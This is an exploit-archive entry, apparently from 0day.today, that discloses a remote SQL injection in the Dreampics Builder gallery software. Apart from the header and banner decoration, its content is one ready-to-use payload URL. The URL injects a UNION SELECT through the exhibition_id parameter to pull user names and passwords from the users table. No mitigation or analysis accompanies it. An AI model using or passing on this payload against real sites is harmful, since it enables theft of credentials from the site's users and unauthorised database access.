id: 5663
date: 08/17/2009
title: Dreampics Builder (exhibition_id) Remote SQL Injection Vulnerability
author: Mr.SQL
cves: 

====================================================================
Dreampics Builder (exhibition_id) Remote SQL Injection Vulnerability
====================================================================



###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( index.php fuseaction )
##
## DREAMPICS BUILDER
##
## http://www.dreamlevels.com/dreampics.php
##
###############################################################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/index.php?fuseaction=gallery.viewPhotos&exhibition_id=-0+union+select+0,0,CONCAT_WS(0x3a,user_name,user_password),0,0,+from+users--
##
########################
########################

#########################################################################################################
#########################################################################################################



#  0day.today [2023-03-21]  #